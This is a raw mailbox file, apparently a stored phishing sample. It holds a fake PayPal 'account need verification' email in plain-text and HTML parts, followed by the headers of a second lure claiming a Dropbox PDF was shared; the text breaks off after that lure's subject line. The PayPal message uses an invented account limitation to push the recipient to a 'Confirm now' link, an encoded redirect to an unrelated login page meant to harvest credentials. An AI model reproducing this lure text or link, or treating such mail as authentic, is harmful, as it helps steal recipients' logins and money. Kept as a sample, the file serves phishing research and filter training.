From: =?utf-8?B?UGF5UGFsIFNlcnZpY2U=?= <do-not-reply@newsletter.com.au>
Reply-To: <no-reply@newsletter.com.au>
Mime-Version: 1.0
Subject: =?utf-8?B?WW91ciBQYXlQYWwgYWNjb3VudCBuZWVkIHZlcmlmaWNhdGlvbg==?=
Date: Sun, 14 Feb 2016 09:56:55 +0800
To: jose@monkey.org
Precedence: bulk
List-Unsubscribe: <http://samirwefi22.newsletter.eu/system/public/unsubscribe_confirm/?member_id=&contact_id=67544701&contact_email=jose@monkey.org>
Content-Type: multipart/alternative; boundary="Newsletter-Alternative-dc87685937004921eeb9e9c3670f352e"
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 73

--Newsletter-Alternative-dc87685937004921eeb9e9c3670f352e
Content-Type: text/plain; charset=utf-8

You are viewing this plain text version of email because your email client does not support HTML emails.

To view this email follow the link below:

http://samirwefi22.newsletter.eu/system/public/view_newsletter/?newsletter_queue_id=NDg2MTE2&contact_id=67544701&contact_email=jose@monkey.org

--Newsletter-Alternative-dc87685937004921eeb9e9c3670f352e
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
</head>
<body>
<center><div id="web_version" style="display: block;"><div style="font-size:2px">&nbsp;</div>
									<div style="font-family:Verdana;font-size:11px;">
										<a href="http://samirwefi22.newsletter.eu/system/public/view_newsletter/?newsletter_queue_id=NDg2MTE2&contact_id=67544701&contact_email=jose@monkey.org">Click Here</a> to view this newsletter in your browser.
									</div>
									<div style="font-size:5px">&nbsp;</div></div><br /></center>
<p>&nbsp;</p>
<table cellpadding="0" cellspacing="0" style="width: 100%;">
<tbody>
<tr>

<td align="center" style="padding-left: 10px; padding-top: 20px; padding-right: 10px; padding-bottom: 0;">

<table cellpadding="0" cellspacing="0" style="width: 600px;">
<tbody>
<tr>

<td align="left" bgcolor="white" style="border: 1px solid #DADADA; background-color: white; border-radius: 10px; padding: 20px;">

<table border="0" cellpadding="0" cellspacing="0">
<tbody>
<tr>

<td style="font-size: 12px; line-height: 16px; font-family: Arial, sans-serif; padding-bottom: 10px; color: #888;"><span style="font-family: Verdana , Arial; font-weight: bold; font-size: 25.0px; line-height: 28.0px;"><span style="font-size: 11px;"><em><strong>

<span style="font-family: Tahoma; font-size: xx-large;"><span style="color: #014e95; font-size: 24pt;">Pay</span><span style="color: #009cde; font-size: 24pt;">Pal</span></span></strong></em></span></span></td>

</tr>
</tbody>
</table>
<table border="0" cellpadding="0" cellspacing="0" style="width: 100%;">
<tbody>
<tr>

<td style="font-size: 18px; line-height: px; font-family: Arial, sans-serif; padding-top: 10px; padding-bottom: 10px; border-bottom-width: 1px; border-bottom-color: #CCC; border-bottom-style: none;"><span style="color: #009cde;">We need your help: Your PayPal account need verification</span></td>

</tr>
</tbody>
</table>
<table border="0" cellpadding="0" cellspacing="0" style="width: 100%;">
<tbody>
<tr>

<td style="font-size: 12px; line-height: px; font-family: Arial, sans-serif; padding-top: 10px; padding-bottom: 10px; border-bottom-width: 1px; border-bottom-color: #CCC; border-bottom-style: none;">Dear client,</td>

</tr>
</tbody>
</table>
<table cellpadding="0" cellspacing="0">
<tbody>
<tr>

<td bgcolor="#EEF7EF" style="text-align: left; font-size: 12px; line-height: 16px; font-family: Arial, sans-serif; border-radius: 10px; background-color: #e3f1ff; padding: 20px;">

<span style="font-size: 12px; line-height: 16px; font-family: Arial, sans-serif; padding-top: 10px; padding-bottom: 10px; border-bottom-width: 1px; border-bottom-color: #CCC; border-bottom-style: none;">
 It looks like your account has limitation due to login from unkown device . We are keep your informations secret so you need to login to your account and provide us with some informations as security check . To reset your account access please enter the link below
<br /> <a href="http://www.newsletter.com.au/link.php?src=YToyOntzOjQ6ImxpbmsiO3M6NTk6Imh0dHBzOi8vdGlnZXIuc29mdHdhcmUvbG1zZGVtby91cC9zZXJ2ZXIvcGhwL2ZpbGVzLy0vbG9naW4vIjtzOjE5OiJuZXdzbGV0dGVyX3F1ZXVlX2lkIjtpOjQ4NjExNjt9" style="color: #279b37;" target="_blank">Confirm now </a></span></td>

</tr>
</tbody>
</table>
<table border="0" cellpadding="0" cellspacing="0" style="width: 100%;">
<tbody>
<tr>

<td style="font-size: 12px; line-height: 16px; font-family: Arial, sans-serif; padding-top: 10px; padding-bottom: 10px; border-bottom-width: 1px; border-bottom-color: #CCC; border-bottom-style: none;"><span style="color: #888;">
As always, if you need help or have any questions, give us a call or go to our Help Center. You can find the link on any page of our website.
</span><br /> <br /> Thank you for being a PayPal customer.<br /> <br /> <br /> <strong>Yours sincerely,<br /> PayPal</strong></td>

</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
<br /> <br /> <br />
<center><br /><div id="unsubscribe_info" style="display: block;"><div style="font-size:20px">&nbsp;</div> 
										<table align="center" cellpadding="0" cellspacing="0" width="100%">
									      <tr>
									        <td bgcolor="#FFFFFF" align="center">
												<div style="font-family:Verdana;font-size:11px; margin-top: 0px; margin-bottom: 7px;">Message sent to: jose@monkey.org </div>
												<div style="font-family:Verdana;font-size:11px; margin-top: 0px; margin-bottom: 10px;">Message sent from: PayPal Service, 15 Street Manchester, London, London (City of) - GB 2017</div>
                                                <div style="font-family:Verdana;font-size:11px; margin-top: 0px; margin-bottom: 0px;">
                                                	<img src="https://www.newsletter.com.au/system/images/newsletter_profile_icon.png" />&nbsp;To unsubscribe, <a href="http://samirwefi22.newsletter.eu/system/public/unsubscribe_confirm/?member_id=MTAyMDcx&contact_id=67544701&contact_email=jose@monkey.org" target="_blank">click here</a><br /><br />
													<a href="http://www.newsletter.com.au"><img src="https://samirwefi22.newsletter.eu/system/public/open_newsletter/?image_option=1&newsletter_queue_id=NDg2MTE2&contact_id=67544701&contact_email=jose@monkey.org" border="0" /></a>
                                                </div>
											</td>
									      </tr>
									     </table>
									     <div style="font-size:10px">&nbsp;</div>
									     </div></center>
</body>
</html>

--Newsletter-Alternative-dc87685937004921eeb9e9c3670f352e--


From jose@monkey.org Mon Feb 15 20:26:52 2016 +0000
Return-Path: info@a1hydraulics.co.uk
Delivered-To: jose@monkey.org
X-FDA: 71191818222.03.class12_1618a1aeb456
Authentication-Results: auth.b.hostedemail.com; dkim=none
	reason="no signature"; dkim-adsp=none (insecure policy);
	dkim-atps=neutral
X-Spam-Summary: 10,1,0,aaa8bf243c3f9348,d41d8cd98f00b204,info@a1hydraulics.co.uk,:info@a1hydraulics.co.uk,RULES_HIT:41:379:455:677:871:962:967:973:988:989:1189:1193:1254:1260:1313:1314:1381:1432:1433:1434:1436:1437:1516:1517:1518:1560:1571:1575:1588:1589:1592:1594:1714:1730:1764:1777:1792:1801:2198:2199:2525:2527:2559:2563:2682:2685:2859:2915:2933:2937:2939:2942:2945:2947:2951:2954:3022:3040:3138:3139:3140:3141:3142:3865:3866:3867:3871:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4180:4181:4184:4250:4321:4552:4605:5007:6119:6120:6238:6261:6354:6650:6687:6748:7281:7398:7901:7903:7904:8518:8583:8603:8957:9025:9040:9149:10004:10214:10265:10394:11232:11473:11537:11604:11657:11658:11914:12043:12438:12555:12561:12740:13139:14096:14571:14596:21060:21080:30022:30026:30054:30055:30064:30075:30079,0,RBL:85.233.165.80:@a1hydraulics.co.uk:.lbl8.mailshell.net-62.8.15.100 64.201.201.201,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fn,MSBL:0,DNSBL:neutral
X-HE-Tag: class12_1618a1aeb456
X-Filterd-Recvd-Size: 313151
Received: from server1.netready.biz (server1.netready.biz [85.233.165.80])
	by imf17.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Mon, 15 Feb 2016 20:26:49 +0000 (UTC)
Received: (qmail 24891 invoked from network); 15 Feb 2016 17:52:28 +0000
Received: from unknown (HELO ?151.237.185.105?) (151.237.185.105)
  by server1.netready.biz with (DHE-RSA-AES256-SHA encrypted) SMTP; 15 Feb 2016 17:52:27 +0000
Content-Type: multipart/mixed; boundary="===============1344904980=="
MIME-Version: 1.0
Subject: McGhie sent you a PDF document via Dropbox
To: Recipients <info@a1hydraulics.co.uk>
